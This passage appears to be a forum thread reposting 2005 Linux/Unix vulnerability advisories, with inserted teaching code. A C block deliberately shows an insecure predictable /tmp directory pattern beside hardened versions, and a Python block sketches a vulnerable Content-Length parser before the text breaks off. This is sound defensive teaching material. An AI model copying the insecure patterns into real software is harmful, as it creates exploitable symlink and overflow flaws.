arbitrary code on a victim's machine. (CAN-2005-2262)

A bug was found in the way Firefox installed its extensions. If a user can
be tricked into visiting a malicious webpage, it may be possible to obtain
sensitive information such as cookies or passwords. (CAN-2005-2263)

A bug was found in the way Firefox handled the _search target. It is
possible for a malicious website to inject JavaScript into an already open
webpage. (CAN-2005-2264)

A bug was found in the way Firefox handled certain Javascript functions. It
is possible for a malicious web page to crash the browser by executing
malformed Javascript code. (CAN-2005-2265)

A bug was found in the way Firefox handled multiple frame domains. It is
possible for a frame as part of a malicious web site to inject content into
a frame that belongs to another domain. This issue was previously fixed as
CAN-2004-0718 but was accidentally disabled. (CAN-2005-1937)

A bug was found in the way Firefox handled child frames. It is possible for
a malicious framed page to steal sensitive information from its parent
page. (CAN-2005-2266)

A bug was found in the way Firefox opened URLs from media players. If a
media player opens a URL that is JavaScript, JavaScript is executed
with access to the currently open webpage. (CAN-2005-2267)

A design flaw was found in the way Firefox displayed alerts and prompts.
Alerts and prompts were given the generic title [JavaScript Application]
which prevented a user from knowing which site created them. (CAN-2005-2268)

A bug was found in the way Firefox handled DOM node names. It is possible
for a malicious site to overwrite a DOM node name, allowing certain
privileged chrome actions to execute the malicious JavaScript. (CAN-2005-2269)

A bug was found in the way Firefox cloned base objects. It is possible for
Web content to navigate up the prototype chain to gain access to privileged
chrome objects. (CAN-2005-2270)

*Product : Fedora Core 3
Name : firefox
Version : 1.0.6 *

http://www.linuxsecurity.com/content/view/119831/102/

Regards

eddie


----------



## eddie5659

A bug was found in the way Thunderbird handled anonymous functions during
regular expression string replacement. It is possible for a malicious HTML
mail to capture a random block of client memory. The Common
Vulnerabilities and Exposures project has assigned this bug the name
CAN-2005-0989.

A bug was found in the way Thunderbird validated several XPInstall related
JavaScript objects. A malicious HTML mail could pass other objects to the
XPInstall objects, resulting in the JavaScript interpreter jumping to
arbitrary locations in memory. (CAN-2005-1159)

A bug was found in the way the Thunderbird privileged UI code handled DOM
nodes from the content window. An HTML message could install malicious
JavaScript code or steal data when a user performs commonplace actions such
as clicking a link or opening the context menu. (CAN-2005-1160)

A bug was found in the way Thunderbird executed JavaScript code. JavaScript
executed from HTML mail should run with a restricted access level,
preventing dangerous actions. It is possible that a malicious HTML mail
could execute JavaScript code with elevated privileges, allowing access to
protected data and functions. (CAN-2005-1532)

A bug was found in the way Thunderbird executed Javascript in XBL controls.
It is possible for a malicious HTML mail to leverage this vulnerability to
execute other JavaScript based attacks even when JavaScript is disabled.
(CAN-2005-2261)

A bug was found in the way Thunderbird handled certain Javascript
functions. It is possible for a malicious HTML mail to crash the client by
executing malformed Javascript code. (CAN-2005-2265)

A bug was found in the way Thunderbird handled child frames. It is possible
for a malicious framed HTML mail to steal sensitive information from its
parent frame. (CAN-2005-2266)

A bug was found in the way Thunderbird handled DOM node names. It is
possible for a malicious HTML mail to overwrite a DOM node name, allowing
certain privileged chrome actions to execute the malicious JavaScript.
(CAN-2005-2269)

A bug was found in the way Thunderbird cloned base objects. It is possible
for HTML content to navigate up the prototype chain to gain access to
privileged chrome objects. (CAN-2005-2270)

*Product : Fedora Core 3
Name : thunderbird
Version : 1.0.6 *

http://www.linuxsecurity.com/content/view/119832/102/

Regards

eddie


----------



## eddie5659

A bug was found in the way Firefox handled synthetic events. It is possible
that Web content could generate events such as keystrokes or mouse clicks
that could be used to steal data or execute malicious JavaScript code. The
Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned
the name CAN-2005-2260 to this issue.

A bug was found in the way Firefox executed Javascript in XBL controls. It
is possible for a malicious webpage to leverage this vulnerability to
execute other JavaScript based attacks even when JavaScript is disabled.
(CAN-2005-2261)

A bug was found in the way Firefox set an image as the desktop wallpaper.
If a user chooses the "Set As Wallpaper..." context menu item on a
specially crafted image, it is possible for an attacker to execute
arbitrary code on a victim's machine. (CAN-2005-2262)

A bug was found in the way Firefox installed its extensions. If a user can
be tricked into visiting a malicious webpage, it may be possible to obtain
sensitive information such as cookies or passwords. (CAN-2005-2263)

A bug was found in the way Firefox handled the _search target. It is
possible for a malicious website to inject JavaScript into an already open
webpage. (CAN-2005-2264)

A bug was found in the way Firefox handled certain Javascript functions. It
is possible for a malicious web page to crash the browser by executing
malformed Javascript code. (CAN-2005-2265)

A bug was found in the way Firefox handled multiple frame domains. It is
possible for a frame as part of a malicious web site to inject content into
a frame that belongs to another domain. This issue was previously fixed as
CAN-2004-0718 but was accidentally disabled. (CAN-2005-1937)

A bug was found in the way Firefox handled child frames. It is possible for
a malicious framed page to steal sensitive information from its parent
page. (CAN-2005-2266)

A bug was found in the way Firefox opened URLs from media players. If a
media player opens a URL that is JavaScript, JavaScript is executed
with access to the currently open webpage. (CAN-2005-2267)

A design flaw was found in the way Firefox displayed alerts and prompts.
Alerts and prompts were given the generic title [JavaScript Application]
which prevented a user from knowing which site created them. (CAN-2005-2268)

A bug was found in the way Firefox handled DOM node names. It is possible
for a malicious site to overwrite a DOM node name, allowing certain
privileged chrome actions to execute the malicious JavaScript. (CAN-2005-2269)

A bug was found in the way Firefox cloned base objects. It is possible for
Web content to navigate up the prototype chain to gain access to privileged
chrome objects. (CAN-2005-2270)

*Product : Fedora Core 4
Name : firefox
Version : 1.0.6 *

http://www.linuxsecurity.com/content/view/119833/102/

Regards

eddie


----------



## eddie5659

A bug was found in the way Thunderbird handled anonymous functions during
regular expression string replacement. It is possible for a malicious HTML
mail to capture a random block of client memory. The Common
Vulnerabilities and Exposures project has assigned this bug the name
CAN-2005-0989.

A bug was found in the way Thunderbird validated several XPInstall related
JavaScript objects. A malicious HTML mail could pass other objects to the
XPInstall objects, resulting in the JavaScript interpreter jumping to
arbitrary locations in memory. (CAN-2005-1159)

A bug was found in the way the Thunderbird privileged UI code handled DOM
nodes from the content window. An HTML message could install malicious
JavaScript code or steal data when a user performs commonplace actions such
as clicking a link or opening the context menu. (CAN-2005-1160)

A bug was found in the way Thunderbird executed JavaScript code. JavaScript
executed from HTML mail should run with a restricted access level,
preventing dangerous actions. It is possible that a malicious HTML mail
could execute JavaScript code with elevated privileges, allowing access to
protected data and functions. (CAN-2005-1532)

A bug was found in the way Thunderbird executed Javascript in XBL controls.
It is possible for a malicious HTML mail to leverage this vulnerability to
execute other JavaScript based attacks even when JavaScript is disabled.
(CAN-2005-2261)

A bug was found in the way Thunderbird handled certain Javascript
functions. It is possible for a malicious HTML mail to crash the client by
executing malformed Javascript code. (CAN-2005-2265)

A bug was found in the way Thunderbird handled child frames. It is possible
for a malicious framed HTML mail to steal sensitive information from its
parent frame. (CAN-2005-2266)

A bug was found in the way Thunderbird handled DOM node names. It is
possible for a malicious HTML mail to overwrite a DOM node name, allowing
certain privileged chrome actions to execute the malicious JavaScript.
(CAN-2005-2269)

A bug was found in the way Thunderbird cloned base objects. It is possible
for HTML content to navigate up the prototype chain to gain access to
privileged chrome objects. (CAN-2005-2270)

*Product : Fedora Core 4
Name : thunderbird
Version : 1.0.6 *

http://www.linuxsecurity.com/content/view/119834/102/

Regards

eddie


----------



## eddie5659

Update to MySQL 4.1.12 (includes a low-impact security fix, see bz#158689). Repair some issues in openssl support. Re-enable the old ISAM table type.

*Product : Fedora Core 4
Name : mysql
Version : 4.1.12 *

http://www.linuxsecurity.com/content/view/119835/102/

Regards

eddie


----------



## eddie5659

FreeBSD version 5.x could allow a local attacker to gain elevated privileges caused by improper validation of user-supplied input in the node type parameter when creating a device. If a local attacker running a jailed process attempts to access the hidden devfs device nodes that are mounted in the jail, the device nodes will be created with normal default access permissions. An attacker could use this to obtain sensitive information or possibly gain elevated privileges on the system.

*Platforms Affected:

FreeBSD Project: FreeBSD 5.x 
*

http://xforce.iss.net/xforce/xfdb/21451

Regards

eddie


----------



## eddie5659

Fetchmail is a remote mail-retrieval and forwarding utility for Unix that uses the POP3 and IMAP protocols. Fetchmail versions 6.2.0, 6.2.5, 6.2.5.1, and possibly earlier versions, are vulnerable to a stack-based buffer overflow caused by improper bounds checking of user-supplied input when handling UIDL responses. By persuading a user to connect to a malicious POP3 server, a remote attacker could overflow a buffer and execute arbitrary code on the system.

*Platforms Affected:

Apple Computer, Inc.: Mac OS Any version 
Cisco Systems, Inc.: Cisco IOS Any version 
Data General: DG/UX Any version 
Eric S. Raymond : Fetchmail 6.2.0 
Eric S. Raymond : Fetchmail 6.2.5 
Eric S. Raymond : Fetchmail 6.2.5.1 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
IBM: AIX Any version 
IBM: OS/2 Any version 
Linux: Linux Any version 
Microsoft Corporation: Windows 95 
Microsoft Corporation: Windows 98 
Microsoft Corporation: Windows 98 Second Edition 
Microsoft Corporation: Windows Me 
Microsoft Corporation: Windows XP 
Microsoft Corporation: Windows 2000 Any version 
Microsoft Corporation: Windows 2003 Any version 
Microsoft Corporation: Windows NT 4.0 
Novell, Inc.: Novell NetWare Any version 
Santa Cruz Operation, Inc.: SCO Unix Any version 
SGI: IRIX Any version 
Sun Microsystems: Solaris Any version 
Wind River Systems, Inc.: BSD Any version 
*

http://xforce.iss.net/xforce/xfdb/21479

Regards

eddie


----------



## eddie5659

This update contains the latest release of Subversion. Subversion 1.2 adds support for locking (reserved checkouts), and includes many bug fixes and improvements.

*Product : Fedora Core 4
Name : subversion
Version : 1.2.1 *

http://www.linuxsecurity.com/content/view/119866/102/

Regards

eddie


----------



## eddie5659

Fix zlib buffer overflow.

*Product : Fedora Core 3
Name : zlib
Version : 1.2.1.2 *

http://www.linuxsecurity.com/content/view/119868/102/

Regards

eddie


----------



## eddie5659

Multiple integer overflow flaws were found in the way Kopete processes Gadu-Gadu messages. A remote attacker could send a specially crafted Gadu-Gadu message which would cause Kopete to crash or possibly execute arbitrary code.

*Product : Fedora Core 4
Name : kdenetwork
Version : 3.4.1 *

http://www.linuxsecurity.com/content/view/119869/102/

Regards

eddie


----------



## eddie5659

Paul Szabo discovered another vulnerability in the File::Path::rmtree function of perl, the popular scripting language. When a process is deleting a directory tree, a different user could exploit a race condition to create setuid binaries in this directory tree, provided that he already had write permissions in any subdirectory of that tree. The Perl interpreter would cause a segmentation fault when the environment changes during the runtime. Code in lib/FindBin contained a regression which caused problems with the MRTG software package.

*Product : Fedora Core 3
Name : perl
Version : 5.8.5 *

http://www.linuxsecurity.com/content/view/119871/102/

Regards

eddie


----------



## eddie5659

Multiple integer overflow flaws were found in the way Kopete processes Gadu-Gadu messages. A remote attacker could send a specially crafted Gadu-Gadu message which would cause Kopete to crash or possibly execute arbitrary code.

*Product : Fedora Core 3
Name : kdenetwork
Version : 3.3.1*

http://www.linuxsecurity.com/content/view/119870/102/

Regards

eddie


----------



## eddie5659

Kopete is vulnerable to several input validation vulnerabilities which may lead to execution of arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 kde-base/kdenetwork < 3.4.1-r1 >= 3.4.1-r1
*>= 3.3.2-r2
2 kde-base/kopete < 3.4.1-r1 >= 3.4.1-r1
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------

*

http://www.linuxsecurity.com/content/view/119892/104/

Regards

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 4
Name : dlm-kernel
Version : 2.6.11.5 *

http://www.linuxsecurity.com/content/view/119895/102/

Regards

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 4
Name : gnbd-kernel
Version : 2.6.11.2 *

http://www.linuxsecurity.com/content/view/119894/102/

Regards

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 4
Name : cman-kernel
Version : 2.6.11.5 *

http://www.linuxsecurity.com/content/view/119896/102/

Regards

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 4
Name : GFS-kernel
Version : 2.6.11.8 *

http://www.linuxsecurity.com/content/view/119897/102/

Regards

eddie


----------



## eddie5659

FreeBSD versions 5.3 and 5.4 could allow a remote attacker to bypass security restrictions caused by a programming error in the implementation of the AES-XCBC-MAC algorithm used for authentication. If the AES-XCBC-MAC algorithm is used without any encryption, a remote attacker could forge packets to appear as if the packets originated from a different system to establish an IPsec session. This would allow the attacker to gain unauthorized access to sensitive information or possibly gain elevated privileges on the system.

*Platforms Affected:

FreeBSD Project: FreeBSD 5.4 
FreeBSD, Inc: FreeBSD 5.3 
*

http://xforce.iss.net/xforce/xfdb/21551

Regards

eddie


----------



## eddie5659

GForge is a team collaboration and repository program for Linux operating systems. GForge version 4.5 and possibly other versions are vulnerable to cross-site scripting caused by improper validation of user-supplied input. A remote attacker could create a specially-crafted URL to multiple parameters in a URL request to the forum.php, task.php, detail.php, search/.php, and qrs.php scripts, including fields within the login form which, once the URL is clicked, would be executed in the victim's Web browser within the security context of the hosting site. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

*Platforms Affected:

GForge: GForge 4.5 
Linux: Linux Any version 
*

http://xforce.iss.net/xforce/xfdb/21558

Regards

eddie


----------



## eddie5659

zlib is vulnerable to a buffer overflow which could potentially lead to execution of arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-libs/zlib < 1.2.3 >= 1.2.3

*

http://www.linuxsecurity.com/content/view/119946/104/

Regards

eddie


----------



## eddie5659

A vulnerability in Shorewall allows clients authenticated by MAC address filtering to bypass all other security rules.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-firewall/shorewall < 2.4.1 *>= 2.2.5
>= 2.4.1
*

http://www.linuxsecurity.com/content/view/119945/104/

Regards

eddie


----------



## eddie5659

The sandbox utility may create temporary files in an insecure manner.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-apps/sandbox < 1.2.11 >= 1.2.11

*

http://www.linuxsecurity.com/content/view/119951/104/

Regards

eddie


----------



## eddie5659

Clam AntiVirus is vulnerable to integer overflows when handling several file formats, potentially resulting in the execution of arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-antivirus/clamav < 0.86.2 >= 0.86.2

*

http://www.linuxsecurity.com/content/view/119950/104/

Regards

eddie


----------



## eddie5659

Several vulnerabilities in the Mozilla Suite allow attacks ranging from the execution of javascript code with elevated privileges to information leakage.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/mozilla < 1.7.10 >= 1.7.10
2 www-client/mozilla-bin < 1.7.10 >= 1.7.10
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------
*

http://www.linuxsecurity.com/content/view/119949/104/

Regards

eddie


----------



## eddie5659

Wine is an open-source application for Unix-based operating systems that loads and executes a Windows binary, including a set of libraries. Wine version 20050725 and possibly other versions are vulnerable to a symlink attack caused by insecure file permissions in the /tmp directory created by winelauncher.in. A local attacker could exploit this vulnerability by creating a symbolic link from a temporary file to other files on the system which would allow the attacker to create or overwrite arbitrary files on the system with the privileges of the victim.

*Platforms Affected:

Data General: DG/UX Any version 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
IBM: AIX Any version 
Linux: Linux Any version 
Santa Cruz Operation, Inc.: SCO Unix Any version 
SGI: IRIX Any version 
Sun Microsystems: Solaris Any version 
Wind River Systems, Inc.: BSD Any version 
Wine: Wine 20050725 
*

http://xforce.iss.net/xforce/xfdb/21732

Regards

eddie


----------



## eddie5659

Updated ruby packages that fix an arbitrary command execution issue are now available. This update has been rated as having moderate security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/120035/110/

eddie


----------



## eddie5659

This update fixes a problem with ttmkfdir not including native encodings of Asian TrueType fonts in fonts.scale files used by the X font server. Users of Chinese, Japanese, and Korean fonts are recommended to reinstall the font packages for these languages after updating ttmkfdir.

*Product : Fedora Core 3
Name : ttmkfdir
Version : 3.0.9 
Release : 14.1 *

http://www.linuxsecurity.com/content/view/120038/102/

eddie


----------



## eddie5659

This update fixes a problem with ttmkfdir not including native encodings of Asian TrueType fonts in fonts.scale files used by the X font server. Users of Chinese, Japanese, and Korean fonts are recommended to reinstall the font packages for these languages after updating ttmkfdir.

*Product : Fedora Core 4
Name : ttmkfdir
Version : 3.0.9 
Release : 16.1 *

http://www.linuxsecurity.com/content/view/120037/102/

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 4
Name : selinux-policy-targeted
Version : 1.25.3 
Release : 12 *

http://www.linuxsecurity.com/content/view/120040/102/

eddie


----------



## eddie5659

Heartbeat is vulnerable to symlink attacks, potentially allowing a local user to overwrite arbitrary files.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-cluster/heartbeat < 1.2.3-r1 >= 1.2.3-r1

*

http://www.linuxsecurity.com/content/view/120041/104/

eddie
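The Wine, sandbox and Heartbeat advisories above all come down to the same pattern: a program creates a predictable path under /tmp with permissive permissions and then trusts whatever it finds there, so a local user who plants a symbolic link at that name redirects the program's writes. The following is an added example, not code from Wine, Heartbeat, the sandbox utility or any of the advisories: it shows the weak pattern beside a hardened one (mkdtemp for the directory, O_EXCL|O_NOFOLLOW for files inside it) and a check a defender can run before trusting an existing directory. The function names and the "example-" prefix are my own; it assumes a POSIX system with mkdtemp and O_NOFOLLOW.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak pattern (constructed to mirror the advisories above): a fixed,
 * predictable path under /tmp, created with a permissive mode, and silently
 * reused when it already exists. Whoever pre-creates that name, or a symlink
 * at it, decides where the program's files end up. */
int make_tmpdir_insecure(char *out, size_t outlen)
{
    snprintf(out, outlen, "/tmp/example-%ld", (long)getuid()); /* hypothetical name */
    if (mkdir(out, 0777) != 0 && errno != EEXIST)
        return -1;
    return 0; /* EEXIST is accepted: whatever is already there is used */
}

/* Hardened replacement: mkdtemp() picks an unpredictable suffix, creates the
 * directory with mode 0700 and fails instead of reusing an existing entry. */
int make_tmpdir_private(char *out, size_t outlen)
{
    const char *base = getenv("TMPDIR");
    if (base == NULL || *base == '\0')
        base = "/tmp";
    if (snprintf(out, outlen, "%s/example-XXXXXX", base) >= (int)outlen)
        return -1;
    return mkdtemp(out) == NULL ? -1 : 0;
}

/* Defender's check for a directory the program is about to trust: lstat() so a
 * symlink is reported as a symlink, then require a real directory owned by the
 * current user with no group/other permission bits. Returns 1 if safe, else 0. */
int tmpdir_is_private(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0)
        return 0;
    if (S_ISLNK(st.st_mode) || !S_ISDIR(st.st_mode))
        return 0;
    if (st.st_uid != geteuid())
        return 0;
    if (st.st_mode & (S_IRWXG | S_IRWXO))
        return 0;
    return 1;
}

/* Create a file inside the private directory: O_EXCL refuses anything that
 * already exists, O_NOFOLLOW refuses to follow a planted symlink.
 * Returns an open descriptor, or -1 on failure. */
int open_private_file(const char *dir, const char *name)
{
    char path[PATH_MAX];
    if (snprintf(path, sizeof path, "%s/%s", dir, name) >= (int)sizeof path)
        return -1;
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

int main(void)
{
    char dir[PATH_MAX], f[PATH_MAX];
    if (make_tmpdir_private(dir, sizeof dir) != 0) {
        perror("mkdtemp");
        return 1;
    }
    printf("private dir %s safe=%d\n", dir, tmpdir_is_private(dir));
    int fd = open_private_file(dir, "status");
    if (fd >= 0) {
        close(fd);
        snprintf(f, sizeof f, "%s/status", dir);
        unlink(f);
    }
    rmdir(dir);
    return 0;
}
```

The check in tmpdir_is_private is what makes the difference for code that must reuse a directory across runs: a path that is a symlink, belongs to someone else, or is group/world writable is rejected before anything is written into it.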


----------



## eddie5659

Kismet is an 802.11b wireless sniffing tool that is compatible with any wireless card supported in Linux. Kismet versions prior to 2005-08-R1 are vulnerable to a heap corruption caused by an integer underflow in the CDP protocol dissector. A remote attacker could use this vulnerability to corrupt the heap and execute arbitrary code on the system.

*Platforms Affected:

Linux: Linux Any version 
Mike Kershaw: Kismet prior to 2005-08-R1 
*

http://xforce.iss.net/xforce/xfdb/21853

eddie


----------



## eddie5659

The Operator Shell (osh) is a setuid root shell used by administrators to restrict users' actions. osh version 1.7 is vulnerable to a buffer overflow in the temp3[] function. A local attacker using a long directory name combined with a long file name to total more than 255 bytes could cause a buffer overflow and execute arbitrary code on the system.

*Platforms Affected:

Debian: Osh 1.7 
Linux: Linux Any version 
*

http://xforce.iss.net/xforce/xfdb/21852

eddie


----------



## eddie5659

Kismet is an 802.11b wireless sniffing tool that is compatible with any wireless card supported in Linux. Kismet versions prior to 2005-08-R1 are vulnerable to an unspecified vulnerability in the handling of unprintable characters in the (SSID) Student Services Information Desk.

*Platforms Affected:

Linux: Linux Any version 
Mike Kershaw: Kismet prior to 2005-08-R1 
*

http://xforce.iss.net/xforce/xfdb/21851

eddie


----------



## eddie5659

AWStats fails to validate certain log input, which could lead to the execution of arbitrary Perl code during the generation of the statistics.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-www/awstats < 6.5 >= 6.5
*

http://www.linuxsecurity.com/content/view/120122/104/

eddie


----------



## eddie5659

Xpdf, Kpdf and GPdf may crash as a result of a Denial of Service vulnerability.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/xpdf < 3.00-r10 >= 3.00-r10
2 kde-base/kdegraphics < 3.3.2-r3 >= 3.3.2-r3
3 kde-base/kpdf < 3.4.1-r1 >= 3.4.1-r1
4 app-text/gpdf < 2.10.0-r1 >= 2.10.0-r1
-------------------------------------------------------------------
4 affected packages on all of their supported architectures.
-------------------------------------------------------------------
*

http://www.linuxsecurity.com/content/view/120123/104/

eddie


----------



## eddie5659

Updated package.

http://www.linuxsecurity.com/content/view/120124/100/

eddie


----------



## eddie5659

Updated acroread packages that fix a security issue are now available. This update has been rated as having critical security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/120125/110/

eddie


----------



## eddie5659

Updated package.

http://www.linuxsecurity.com/content/view/120126/100/

eddie


----------



## eddie5659

Hiya

This thread will be at the top for all of January. For any previous months, I've created a new thread here:

http://forums.techguy.org/unix-linux/225642-linux-unix-vulnerabilities.html

However, this is just from April 2004. Any previous ones are on their own

Regards

eddie


----------



## eddie5659

*Mandriva: Updated pdftohtml packages fix several vulnerabilities *

Heap-based buffer overflow in the StreamPredictor function in Xpdf 3.01 allows remote attackers to execute arbitrary code via a PDF file with an out-of-range numComps (number of components) field. (CVE-2005-3192) Heap-based buffer overflow in the JPXStream::readCodestream function in the JPX stream parsing code (JPXStream.c) for xpdf 3.01 and earlier allows user-complicit attackers to cause a denial of service (heap corruption) and possibly execute arbitrary code via a crafted PDF file with large size values that cause insufficient memory to be allocated.

http://www.linuxsecurity.com/content/view/121173/106/

eddie


----------



## eddie5659

*Mandriva: New libpaper1 packages provide libpaper1 to x86_64 platform *

Corporate Desktop 3.0/x86_64 did not ship with the libpaper1 library which prevented the included gpdf and kpdf programs from working. This update provides libpaper1.

http://www.linuxsecurity.com/content/view/121174/106/

eddie


----------



## eddie5659

*Mandriva: Updated xpdf packages fix several vulnerabilities *

Multiple heap-based buffer overflows in the DCTStream::readProgressiveSOF and DCTStream::readBaselineSOF functions in the DCT stream parsing code (Stream.cc) in xpdf 3.01 and earlier, allow user-complicit attackers to cause a denial of service (heap corruption) and possibly execute arbitrary code via a crafted PDF file with an out-of-range number of components (numComps), which is used as an array index. (CVE-2005-3191)

http://www.linuxsecurity.com/content/view/121175/106/

eddie


----------



## eddie5659

*Mandriva: Updated gpdf packages fix several vulnerabilities *

Multiple heap-based buffer overflows in the DCTStream::readProgressiveSOF and DCTStream::readBaselineSOF functions in the DCT stream parsing code (Stream.cc) in xpdf 3.01 and earlier, allow user-complicit attackers to cause a denial of service (heap corruption) and possibly execute arbitrary code via a crafted PDF file with an out-of-range number of components (numComps), which is used as an array index. (CVE-2005-3191)

http://www.linuxsecurity.com/content/view/121176/106/

eddie


----------



## eddie5659

*Mandriva: Updated apache2 packages fix vulnerabilities *

A flaw was discovered in mod_imap when using the Referer directive with image maps that could be used by a remote attacker to perform a cross-site scripting attack, in certain site configurations, if a victim could be forced to visit a malicious URL using certain web browsers (CVE-2005-3352).

http://www.linuxsecurity.com/content/view/121177/106/

eddie


----------



## eddie5659

*Apache mod_auth_pgsql module multiple syslog format strings*

The mod_auth_pgsql module for Apache provides user authentication and logging functionality for PostgreSQL databases. mod_auth_pgsql versions 2.0.1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by multiple format string vulnerabilities in the logging functionality. A remote attacker could exploit this vulnerability to execute arbitrary command on the system with privileges of the Apache Web server process.

*Platforms Affected:

Guiseppe Tanzilli and Matthias Eckermann: mod_auth_pgsql 2.0.1 and earlier 
Red Hat, Inc.: Red Hat Desktop 3 
Red hat, Inc.: Red Hat Desktop 4 
Red Hat, Inc.: Red Hat Enterprise Linux AS 3 
Red Hat, Inc.: Red Hat Enterprise Linux AS 4 
Red Hat, Inc.: Red Hat Enterprise Linux ES 3 
Red Hat, Inc.: Red Hat Enterprise Linux ES 4 
Red Hat, Inc.: Red Hat Enterprise Linux WS 3 
Red Hat, Inc.: Red Hat Enterprise Linux WS 4 
*

http://xforce.iss.net/xforce/xfdb/24003

eddie


----------



## eddie5659

*Gentoo: HylaFAX Multiple vulnerabilities *

HylaFAX is vulnerable to arbitrary code execution and unauthorized access vulnerabilities.

http://www.linuxsecurity.com/content/view/121181/104/

eddie


----------



## eddie5659

*RedHat: Low: struts security update for Red Hat Application Server *

Updated Red Hat Application Server components are now available including a security update for Struts. This update has been rated as having low security impact by the Red Hat Security Response Team.

*Relevant releases/architectures:

Red Hat Application Server 3AS - noarch
Red Hat Application Server 3ES - noarch
Red Hat Application Server 3WS - noarch*

http://www.linuxsecurity.com/content/view/121224/110/

eddie


----------



## eddie5659

*RedHat: Important: cups security update *

Updated CUPS packages that fix multiple security issues are now available for Red Hat Enterprise Linux. This update has been rated as having important security impact by the Red Hat Security Response Team.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/121225/110/

eddie


----------



## eddie5659

*RedHat: Important: gpdf security update *

An updated gpdf package that fixes several security issues is now available for Red Hat Enterprise Linux 4. This update has been rated as having important security impact by the Red Hat Security Response Team.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/121226/110/

eddie


----------



## eddie5659

*RedHat: Moderate: apache security update *

Updated Apache httpd packages that correct a security issue are now available for Red Hat Enterprise Linux 2.1. This update has been rated as having moderate security impact by the Red Hat Security Response Team.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
*

http://www.linuxsecurity.com/content/view/121227/110/

eddie


----------



## eddie5659

*RedHat: Important: kernel security update *

Updated kernel packages that fix several security issues in the Red Hat Enterprise Linux 4 kernel are now available. This security advisory has been rated as having important security impact by the Red Hat Security Response Team.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 4 - i386, ia64, noarch, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, noarch, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, noarch, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, noarch, x86_64
*

http://www.linuxsecurity.com/content/view/121228/110/

eddie


----------



## eddie5659

*Novell SUSE Remote Manager buffer overflow*

Novell SUSE Open Enterprise Server version 9.0, and possibly other versions, is vulnerable to a heap-based buffer overflow in the Novell Remote Manager service (novell-nrm). By sending an HTTP request with a negative Content-Length header, a remote attacker could overflow a buffer and execute arbitrary code on the system.

*Platforms Affected:

Novell: Novell Open Enterprise Server Any version 
SuSE: SuSE Linux Enterprise Server 9 
*

http://xforce.iss.net/xforce/xfdb/24111

eddie
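An added example for the novell-nrm post above (editor's code, not Novell's): the advisory describes a negative Content-Length reaching a heap allocation. In C the usual root cause is an `atoi()`-style parse into a signed integer that is then passed to `malloc()`/`read()` as `size_t`, where -1 becomes the largest possible value. The block below models that conversion in Python, then shows a header parser that enforces the RFC 7230 grammar (digits only, no sign) and an application ceiling before anything is allocated. The `1 << 20` limit, the `as_size_t` width and the sample headers are all assumptions made for the example.

```python
import io
import re

# Mirrors the novell-nrm flaw above: Content-Length parsed with a signed
# integer routine, then used to size a heap buffer and drive the read loop.


def parse_content_length_vulnerable(value):
    """atoi()-style parse: skips whitespace, accepts a sign, stops at the first
    non-digit and never bounds the result. "-1" comes back as -1."""
    digits = re.match(r"\s*([+-]?\d*)", value).group(1)
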